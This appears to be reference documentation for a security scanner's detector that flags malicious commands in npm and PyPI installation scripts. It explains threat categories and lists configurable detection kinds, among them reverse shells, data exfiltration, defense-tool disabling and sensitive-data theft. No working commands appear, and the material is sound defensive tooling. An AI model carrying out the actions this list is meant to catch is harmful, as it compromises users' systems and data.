Malicious Installation Scripts

ID

malicious_installation_scripts

Severity

critical

Resource

Package

Tags

generic

Description

This detector checks for potentially malicious commands executed from the installation scripts.

Rationale

Installation scripts, if used maliciously, can pose a significant threat to the security of a system.

These scripts are designed to automate the installation, but they may download and install dependencies or external components. Malicious actors can manipulate these dependencies to include malware, thereby infecting the system during the installation process.

These are the command kinds to take attention to:

  • Data enumeration and Data exfiltration: This is related to malicious software specifically designed to surreptitiously collect and transmit sensitive or confidential data from a compromised system to an external location controlled by attackers. This type of malware poses a serious threat to the confidentiality and integrity of data within an organization.

  • Execution Policy Bypass: The execution policy isn’t a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally. Thus, malware can easily take advantage of this to be able to execute the malicious code.

  • External request: This is more generic, but still relevant. Sometimes malicious code performs generic external request from the affected system against the malicious host, just to inform that the infected system is still alive, a kind of ping.

  • File download: Usually a malware infection involves more than one phase/ malicious set of files. A common situation is to download more malicious scripts/ binaries from malicious host to ensure system persistence or to increase the capacities of the malware.

  • Reverse shell: This refers to a scenario where malware establishes a reverse shell to provide unauthorized access and control over an infected system to an external attacker. Once they obtain this, the system is totally under their control.

  • Reverse shell listener: This refers to a scenario where the infected system establishes a connection to a malware host, probably to one that is serving a file, that it’s meant to be executed on the affected system to ensure system persistence or to increase the capacities of the malware.

  • Scheduled task: This typically involves malicious software creating scheduled tasks on an infected system to execute certain actions at specified times or intervals. This may ensure persistence and availability every time that the system boots.

Related Malware campaigns

Pretty common among NPM and Pypi malicious packages campaigns.

Most of the malicious packages in these environments use the installation scripts as the injection entry point.

Configuration

The detector has a parameter named command_kinds that allows configuring the commands that the detector is going to report.

The available values are:

  • clipboard_leakage

  • data_exfiltration

  • defense_tool_disabled

  • decoded_code_execution

  • dependency_installation_on_runtime

  • destructive_action

  • downloaded_code_execution

  • file_download

  • file_execution

  • reverse_shell

  • reverse_shell_listener

  • sensitive_data

  • scheduled_task

References